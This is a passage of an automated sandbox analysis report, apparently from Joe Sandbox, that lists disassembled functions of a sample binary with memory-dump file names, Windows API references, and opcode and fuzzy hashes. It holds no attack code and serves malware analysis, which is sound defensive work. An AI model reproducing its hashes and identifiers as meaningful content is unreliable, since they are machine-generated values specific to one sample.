                                        • Opcode Fuzzy Hash: 6613322fbb66f2451a1c2c104eb9f36dd71b3efcb5a9db2c47ce8b3481b5f9d2
                                        • Instruction Fuzzy Hash: 13F0B471A4620CBFCB135F51CC26DAEBF69EF08B51F404165FD085A260DB725A209BD5
                                        Function 002FADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Alloc
                                        • String ID: FlsAlloc
                                        • API String ID: 2773662609-671089009
                                        • Opcode ID: 725c21d837c2a660276cd6b683713fa59399a192a7a2d0eacb745f94ccff20ce
                                        • Instruction ID: 1cac735f770bfc736e12222ea301664e67912a981d748f68a19d14812b70e741
                                        • Opcode Fuzzy Hash: 725c21d837c2a660276cd6b683713fa59399a192a7a2d0eacb745f94ccff20ce
                                        • Instruction Fuzzy Hash: 50E05C70A4220C7BC2036B15CC22D7EFB58DB08720F0000AAF90453280CE706E1046C5
                                        Function 002EE1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 0282491155722ddea6b4192fc4d783e8512ddcbfa3d2b65733e763c7bf478bd5
                                        • Instruction ID: 4758675691edfe5fca2a6f2f7f7f9b7c3d17fcafec079111ff5dd80946fa16b2
                                        • Opcode Fuzzy Hash: 0282491155722ddea6b4192fc4d783e8512ddcbfa3d2b65733e763c7bf478bd5
                                        • Instruction Fuzzy Hash: E8B012DD2FD180AC3509A24B1C52D3B010DC0C2B11371813EFC09C40C0E9806C540931
                                        Function 002EE1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 9d650037a4a979353da577b7fe06beca2fbe9f0736fb1a9d52d222ec0073893b
                                        • Instruction ID: ed84f2e7127ace350aca6b6d2c6dd0a4fc09c0e2ded35f5462387c2aa03a8249
                                        • Opcode Fuzzy Hash: 9d650037a4a979353da577b7fe06beca2fbe9f0736fb1a9d52d222ec0073893b
                                        • Instruction Fuzzy Hash: 8BB012D92F9080AC3509A3071C12D3B010DC4C3B11371C13EFC09C42C0E880AC5C0831
                                        Function 002EE1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: bd9e5a644092dbec96876334019290f258ca522a5ab24d95f4188fa8069009a6
                                        • Instruction ID: 5e15a3a2e37fef3ada4fbb8c9ab2b983445eea7297af0697b7bc2e61913ae33d
                                        • Opcode Fuzzy Hash: bd9e5a644092dbec96876334019290f258ca522a5ab24d95f4188fa8069009a6
                                        • Instruction Fuzzy Hash: A9B012DD2F9180BC350962471C62C3B010DC0C3B11371C53EFC05C44C0E880AC540831
                                        Function 002EE228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 599ed448c54bc27ccf348f86c9c632fadc3b02f77e83868aeef1509a73a8c00c
                                        • Instruction ID: ab29d08ef79a6edc59d01af3cbe0633e48e62e6094dbc623686687602ac75449
                                        • Opcode Fuzzy Hash: 599ed448c54bc27ccf348f86c9c632fadc3b02f77e83868aeef1509a73a8c00c
                                        • Instruction Fuzzy Hash: 1EB012E92F9180BC3549A2071C12D3B011DC0C2F12371823EF809C40C0E8C06DD40831
                                        Function 002EE23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: af3fac02b65bf83cb2c392d760118fc2e4dbfbaa71ff59b9a4813a0dc082a7e7
                                        • Instruction ID: 7151140d717585e3a6dce3161785ce44e00867f345fb2f165ac60a86be83336b
                                        • Opcode Fuzzy Hash: af3fac02b65bf83cb2c392d760118fc2e4dbfbaa71ff59b9a4813a0dc082a7e7
                                        • Instruction Fuzzy Hash: 2DB012E92F9080AC3509A2071C12D3B011DC0C2F11371813EF809C40C0E8806D940831
                                        Function 002EE232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 11afb6837b54cf31d8ff251b1754ae934a3f6cca243a4c595cb4ed3f0b481d5b
                                        • Instruction ID: 0b93a04211ee9be5fe68de89a9ac21c4cca5669c27c3453a5f7791a7ee8d69e3
                                        • Opcode Fuzzy Hash: 11afb6837b54cf31d8ff251b1754ae934a3f6cca243a4c595cb4ed3f0b481d5b
                                        • Instruction Fuzzy Hash: A8B012E92F9080AC3509A2071D12D3B011DC0C2F11371813EF809C40C0EC806ED51831
                                        Function 002EE20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 4ac7fb1f6ac6305fc76731580acb6a9b590beb8c053dba43868721896bfc9297
                                        • Instruction ID: 0f4a01cc4fdd241a1c9b2ea18d677def5fcbb795943bc2ad7154d85a06051593
                                        • Opcode Fuzzy Hash: 4ac7fb1f6ac6305fc76731580acb6a9b590beb8c053dba43868721896bfc9297
                                        • Instruction Fuzzy Hash: 34B012D92F9080AC3509A3071D12D3B010DC4C2B11371C13EF809C42C0EC906D9D1831
                                        Function 002EE200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: ab308ea13e083709b5a3599259a0cd74b04966e944bdf9c4ec674b5d40ea2e57
                                        • Instruction ID: 0af5aa4dbba56346f604524b7ac7d228ad4be25690ab0970eed8db83baf1fb1e
                                        • Opcode Fuzzy Hash: ab308ea13e083709b5a3599259a0cd74b04966e944bdf9c4ec674b5d40ea2e57
                                        • Instruction Fuzzy Hash: 3DB012D93F91C0BC3549A3071C12D3B010DC4C2B12371C23EF809C42C0E8C06C980831
                                        Function 002EE21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: b41523b6b61650fa5b8dd16f12e6b3dab1a0d31bdbe9d2b18e01a60545fda1b6
                                        • Instruction ID: e450b29e7a3d3228a7a5935061fc56203567418972e5f2d418a22d2fe5f84afa
                                        • Opcode Fuzzy Hash: b41523b6b61650fa5b8dd16f12e6b3dab1a0d31bdbe9d2b18e01a60545fda1b6
                                        • Instruction Fuzzy Hash: 77B012E92F9080BC3509A2071C12D3B011DC0C3F11371C13EFC09C40C0E880AD940831
                                        Function 002EE26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 605dd0376cef489926fd7952fe5f07b8e69239a86eb6c1ed5fb4c0543dba111a
                                        • Instruction ID: 4d9809aa7831b0e85523b2d2792a73d456e1c0d1a4a874d5152428b303f6ffba
                                        • Opcode Fuzzy Hash: 605dd0376cef489926fd7952fe5f07b8e69239a86eb6c1ed5fb4c0543dba111a
                                        • Instruction Fuzzy Hash: 52B012D92FD080AC3509A2171C12D3B014DC0C3B11371C13EFC09C40C0E980AC540831
                                        Function 002EE264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 1d1a0a6042713cfce7684e911e9cc0f700030d781afb2b3628edaa549656dfb7
                                        • Instruction ID: 1d9a4b3246752adeb3b6cee6b4d7b4f02ca77d5d2044806d1259061e7ec1fd1e
                                        • Opcode Fuzzy Hash: 1d1a0a6042713cfce7684e911e9cc0f700030d781afb2b3628edaa549656dfb7
                                        • Instruction Fuzzy Hash: 43B012D92FA0C0AC3509A2071C12D3B014EC4C2B21771813EF80AC40C0E8806C540832
                                        Function 002EE246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 3374d828520d939d481a6ec5371379682cb8391bc4939e3f3f42ea9d22f4cbad
                                        • Instruction ID: a6af124afa7fe3064eeb2aaf702f4e88c31b9e4e7d59546f8502d6a5c516f45f
                                        • Opcode Fuzzy Hash: 3374d828520d939d481a6ec5371379682cb8391bc4939e3f3f42ea9d22f4cbad
                                        • Instruction Fuzzy Hash: D6B012D93FA0C0AC3509A2071C12D3B010EC0C3B21771C13EFC09C40C0E880AC540832
                                        Function 002EE250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 0c1322274d0de868f8b026933b797581038e0ed6223e840579428ad7c4fb92a7
                                        • Instruction ID: dc8ec8fab76e28fd117eb67307b81ee9bb46263f7a55cef03cd1a85ef5c2df03
                                        • Opcode Fuzzy Hash: 0c1322274d0de868f8b026933b797581038e0ed6223e840579428ad7c4fb92a7
                                        • Instruction Fuzzy Hash: ABB012E92FA1C0BC3549A3071C12D3B010EC0C2B22771823EF809C40C0E8C06C980832
                                        Function 002EE282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 1348d56a52533d392922b6bde66b94eee6c7f7c9c309a842335be5ad405ca585
                                        • Instruction ID: 5cff5bd38a01c29613f99caffd58f20e3634ee66048e7f81cc8a7fd0cf4a92d0
